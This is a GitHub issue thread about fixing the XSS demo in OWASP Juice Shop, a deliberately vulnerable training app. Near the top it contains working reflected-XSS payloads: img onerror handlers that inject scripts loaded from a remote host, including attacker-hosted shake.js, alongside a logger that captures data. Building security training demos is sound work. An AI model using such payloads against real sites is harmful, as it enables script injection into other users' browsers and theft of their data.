### ISSUE TITLE
XSS Demo link not working

### ISSUE THREAD

**Issue by M4ttsson** [juice-shop/juice-shop#775]
I tried the demo for XSS and it doesn't work anymore. I followed the instructions and are running docker-compose correctly and the page works fine. 

First problem is that the <script> tag is not working in the search field anymore. I changed that to an img instead and the script tag for shake.js is created correctly. But then I get a syntax error in shake.js. Seems like JQuery is missing and shake.js needs it. 

I tried in a lot of ways to import jquery toghether with the "malicious" script since it was the funniest thing to do but never managed it to work. shake.js was always complaining about syntax error if the script tag for jquery was not already on the page. (so it works if searching twice). The only solution i found is to edit index.html and add a script tag with jquery with cdnjs. 

I've done the change locally and it is working. I could create a pull-request if you want? The con is that the application will import jquery but not use it except for the XSS Demo. 

New img link: 
`http://localhost:3000/#/search?q=<img src=x onerror='var js=document.createElement("script");js.type = "text/javascript";js.src="http://localhost:8080/shake.js";document.body.appendChild(js);var hash=window.location.hash;window.location.hash=hash.substr(0,8);'/>apple`

I will leave my best attempt at importing both scripts at the same time here, perhaps someone with more html/js knowledge than me can fix it. 
`<img src=x onerror='var jq=document.createElement("script");jq.type = "text/javascript";jq.src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js";document.head.appendChild(jq);var js=document.createElement("script");js.type = "text/javascript";js.src="http://192.168.56.102:8080/shake.js";js.defer=true;document.body.appendChild(js);var hash=window.location.hash;window.location.hash=hash.substr(0,8);'/>apple`

**Comment by bkimminich** [comment]
That is _awesome_, please submit a PR for this! Having a CDN-import of `jquery` is fine - story-wise it could be a "forgotten import", which happens a lot in real applications as well... ;-)

Also, the XSS Demo never worked w/o Internet access anyway as `shake.js` is loaded via CDN as well, so it's not that we are getting any worse here.

**Comment by bkimminich** [comment]
We could even make a :star: or :star::star: challenge out of this:

```
-
  name: 'Unnecessary Import'
  category: 'Forgotten Content'
  description: '<a href="/#/contact">Inform the shop</a> about an unnecessarily imported frontend library. (Mention the exact library name and version in your comment)'
  difficulty: 2
  hint: 'No need to dig into backend dependencies for this challenge. Report the answer via the "Contact Us" form.'
  hintUrl: 'https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/forgotten-content.html#inform-the-shop-about-an-unnecessarily-imported-frontend-library'
  key: unnecessaryImportChallenge
```

**Comment by M4ttsson** [comment]
Yes that could be nice, I could perhaps look at it later? 

I created a pull request for this change now. Perhaps you could test it with the new link so I know it works somewhere else than my machine. :)

**Comment by bkimminich** [comment]
As it's not a dangerous change for the rest of the app I'll merge it and then try it out locally on `develop`, sure! If it works fine, you could replicate your change into https://github.com/wurstbrot/shake-logger maybe?

**Comment by bkimminich** [comment]
I don't get the Vagrant setup working due to Apache issues, but those existed before. If it works for you, that's good enough for me, but maybe @wurstbrot wants to verify the new link works?

**Comment by M4ttsson** [comment]
The link works for me at least and as you said the change should not affect anything at all. 

But unfortunately now I have some problems with the log part of the shake-logger. It logs to console just fine, but the injected img tries to connect to port 80808080808080808080. It's enough for my purpose to show the console log, but maybe I should create an issue on shake-logger as well? 

![image](https://user-images.githubusercontent.com/14147055/50904544-d36a9f80-1420-11e9-82d2-2e7526b56926.png)

**Comment by bkimminich** [comment]
Yes, that'd be great! I'll assign this ticket to @wurstbrot to verify the Juice Shop end and maybe come up with some idea why Vagrant is so picky (for me) ... ;-)

**Comment by wurstbrot** [comment]
Hi,

I am using branch develop, go to vagrant via _cd vagrant_ and change the docker image in _bootstrap.sh_ to _snapshop_ to have the new changes.

Afterwards I perform _vagrant up_ wait a few seconds and put the given img URL into my browser by using 192.168.33.10 instead of localhost.

Shake starts. The only disadvantage is, that the audio is not working the first time due to a dom parsing error and it is shaking for ever.

I do not have any apache errors.

**Comment by M4ttsson** [comment]
Strange. I will see if I can try it on another computer as well this weekend. 

I'm a bit new to docker and vagrant, so I'm not sure where in bootstrap.sh you changed for it to run the latest changes. I'm running lubuntu in a virtualbox vm. On branch develop. I ran the bootstrap.sh to start docker image, then i ran npm start but on port 4000 to get my changes. If I then navigate to the img URL (changed to port 4000) I get both shake and music. 
I even got the logger to work if I changed target_socket to localhost instead of the vagrant ip. So the issues I had with the logger must somehow be related to docker-compose. Due to my docker-newbieness I got some errors and can't bring up the docker-compose alternative again to verify.

**Comment by M4ttsson** [comment]
hmm. This is even stranger. It works with audio and shake when on my vm using localhost. But changing the url to my vm ip and connecting from my host (windows) I get the DOM exception and no audio. But it worked just fine from my host yesterday when using docker-compose.

**Comment by M4ttsson** [comment]
Solved my difference between host and vm at least. It only works completely in firefox for me. In chrome I get the dom exception the first time. After I removed /var/lib/docker and started it again I don't get the problem with port 808080808080 anymore either.

**Comment by bkimminich** [comment]
Ooookay, I can now confirm that using the `shake-logger` launch option without Vagrant and instead `docker-compose` the XSS Demo works in Firefox. What doesn't work for me is the Logger:

```
Warning: file_get_contents(/tmp/logger.php): failed to open stream: No such file or directory in /var/www/html/logger.php on line 8
```

**Comment by M4ttsson** [comment]
Try sending a request manually to the logger using the input parameter, it should create the file then and the error message should dissappear.

**Comment by bkimminich** [comment]
@wurstbrot, is this something that could be fixed by providing an empty log file up front?
